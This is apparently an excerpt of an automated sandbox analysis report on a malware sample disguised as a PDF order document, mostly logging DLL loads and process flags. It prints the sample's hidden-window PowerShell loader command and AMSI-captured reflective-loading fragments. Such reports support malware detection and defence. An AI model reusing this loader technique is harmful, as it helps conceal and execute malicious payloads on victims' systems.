            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Order requirements CIF Greece_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2047558142.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdb source: powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Hamule $Organicism $provicariate), (Exceedingly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fanemarch = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($fraternation)), $Reguleringsordningers).DefineDynamicModule($Topklasser, $false).DefineType($Gader, $Agiel, [System.MulticastDelegate]
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04FDCA85 push eax; mov dword ptr [esp], edx1_2_04FDCA8C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04220C66 push eax; retf 6_2_04220C70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04224E40 push ebx; ret 6_2_04224E52
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04222E87 pushad ; ret 6_2_04222E88
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04225902 push B417840Ah; retf 6_2_04225907
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0422094F push ss; retf 6_2_04220958
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042217B2 push ebp; retf 6_2_042217B3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04222FF1 push esi; ret 6_2_0422300A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_042249CF push ebx; ret 6_2_042249D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F7891E pushad ; iretd 6_2_20F7891F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F73AA1 push eax; ret 6_2_20F73CA5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F78C2F pushfd ; iretd 6_2_20F78C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_20F78DDF push esp; iretd 6_2_20F78DE0

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
